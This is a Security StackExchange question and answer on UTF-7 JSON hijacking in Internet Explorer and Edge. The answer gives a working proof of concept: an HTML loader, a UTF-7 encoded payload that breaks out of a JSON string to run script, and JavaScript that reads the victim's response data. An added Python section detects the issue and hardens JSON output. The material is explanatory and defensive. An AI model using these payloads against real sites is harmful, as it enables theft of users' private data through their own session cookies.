
After some research, I saw an answer on StackOverflow saying that it's still possible to perform a UTF-7 JSON hijack using Microsoft IE and Edge browsers. If yes, how can it be done? I really need an explanation about this or a working proof of concept.

schroeder
Test
    It would help if you referenced the actual question you are talking about. If you mean this question: http://stackoverflow.com/questions/16289894/is-json-hijacking-still-an-issue-in-modern-browsers then the accepted answer has a PoC. – schroeder Apr 21 '16 at 04:11
  • @schroeder I think the OP is talking about UTF-7 XSS: http://security.stackexchange.com/questions/47489/utf-7-xss-attacks-in-modern-browsers, since he mentioned UTF-7. The link you found is about JSON hijacking by modifying prototypes. – Franklin Yu Oct 01 '16 at 03:41
  • @FranklinYu but that question is not on StackOverflow ... – schroeder Oct 01 '16 at 06:31
  • @schroeder Yes, I didn't mean that the question I linked was the one OP encountered. I meant he might be searching for such a topic. I can't find anything about the topic on StackOverflow, and I think OP might benefit from reading the Q&A. Anyway, who knows, OP hasn't shown up since August. – Franklin Yu Oct 01 '16 at 17:35

1 Answer


I assume you're referring to this comment, "Microsofts IE and Edge are still vulnerable to the UTF-7 JSON Hijacking though."

Following the instructions from this 2011 blog post on JSON Hijacking, I reproduced the problem with Microsoft Edge 20 and IE11.

Create an HTML file like this:

<html>
<body>
<script src="x.json" charset="UTF-7"></script>
</body>
</html>

And an x.json file like this:

[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]

In the UTF-7 encoding, that apparently decodes to:

[{'friend':'luke','email':''}];alert('May the force be with you');[{'job':'done'}]

And then, given the power to execute JavaScript in the context of the response, you can write more/other evil code, e.g. code to read the rest of the response. For example:

[{'friend':'luke','email':''}, 1].sort(function(x,y) {
    for (var o in x) {
        alert(o + ":" + x[o]);
    }
});
setTimeout(function() {
    var x = data[0];
    for (var o in x) {
        alert(o + ":" + x[o]);
    }
}, 100);var data=[{'job':'done'}];

Read the blog post for more details about the implications of this, but the idea is that you'd get a user to open a page on your site, make this script request (which would use the victim's cookie credentials), and then JSON hijack it to read a partial list of the user's friends.

Dan Fabulich
  • I think a key point here is that you need to be able to set some of the data you're getting. If you are one of the victim's friends, for instance... – DylanYoung Nov 23 '17 at 16:22
  • I did this in 2010 at https://www.reddit.com/r/programming/comments/b7ebd/json_sniffing_with_utf7_injections_will_only_work/ and https://web.archive.org/web/20100304213300/http://code.eligrey.com/poc/json-hijacking/ – Eli Grey Mar 10 '19 at 21:58
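The answer above decodes the attacker's x.json by eye; the check a defender wants is the reverse one, run against the JSON the server itself emits. The following is an added example in Python, not code from the answer or from the 2011 blog post it cites. It shows how a UTF-7 decoder re-reads a pure-ASCII JSON body that contains a shift sequence, and a serialiser plus response headers that leave no shift sequence to exploit. The sample body is constructed for this example: its value `+ACcAfQBd-` is the first eight base64 characters of the answer's payload, which decode to the three characters `'}]`. The helper names `utf7_view`, `utf7_changes_meaning`, `safe_json_dumps` and `json_response` are this example's own.

```python
import json

# Constructed sample in the shape of the answer's x.json.  The JSON is pure
# ASCII; only the string value carries a UTF-7 shift sequence ("+...-").
SAMPLE_JSON = b"[{'friend':'luke','email':'+ACcAfQBd-'}]"


def utf7_view(body: bytes) -> str:
    """Return the text a client honouring charset=UTF-7 would see for this body.

    Malformed shift sequences are replaced rather than rejected, so the
    function never raises on attacker-influenced input.
    """
    return body.decode("utf-7", errors="replace")


def utf7_changes_meaning(body: bytes) -> bool:
    """True if reading the body as UTF-7 differs from reading it as ASCII.

    Any difference means a shift sequence survived serialisation, i.e. a
    client that decodes the response as UTF-7 would see characters (quotes,
    brackets, semicolons) the server never intended to send.
    """
    return utf7_view(body) != body.decode("ascii", errors="replace")


def safe_json_dumps(obj) -> str:
    """Serialise obj so the output can never contain a UTF-7 shift sequence.

    json.dumps(ensure_ascii=True) already escapes every non-ASCII character;
    escaping '+' as \\u002b removes the only byte that can open a shift
    sequence.  The result is still valid JSON and round-trips unchanged.
    """
    return json.dumps(obj, ensure_ascii=True).replace("+", "\\u002b")


def json_response(obj) -> tuple[dict, bytes]:
    """Headers and body for a JSON API response hardened against this hijack.

    An explicit charset stops the client from guessing the encoding, and
    X-Content-Type-Options: nosniff makes browsers that honour it refuse to
    execute a non-script MIME type pulled in through <script src>.
    """
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, safe_json_dumps(obj).encode("ascii")


if __name__ == "__main__":
    print("raw body      :", SAMPLE_JSON.decode("ascii"))
    print("UTF-7 reading :", utf7_view(SAMPLE_JSON))
    print("re-interpreted:", utf7_changes_meaning(SAMPLE_JSON))

    # Same data, hardened: the '+' is escaped, so the UTF-7 reading is identical.
    record = [{"friend": "luke", "email": "+ACcAfQBd-"}]
    headers, body = json_response(record)
    print("hardened body :", body.decode("ascii"))
    print("re-interpreted:", utf7_changes_meaning(body))
    print("round-trips   :", json.loads(body) == record)
```

The UTF-7 reading of the sample body shows the string value closing early and a stray `'}]` appearing after the array, which is exactly the break-out the answer's longer payload extends into an `alert(...)` call. After `safe_json_dumps`, the body contains no `+` byte at all, so there is nothing for a UTF-7 decoder to reinterpret, whatever charset the embedding page claims.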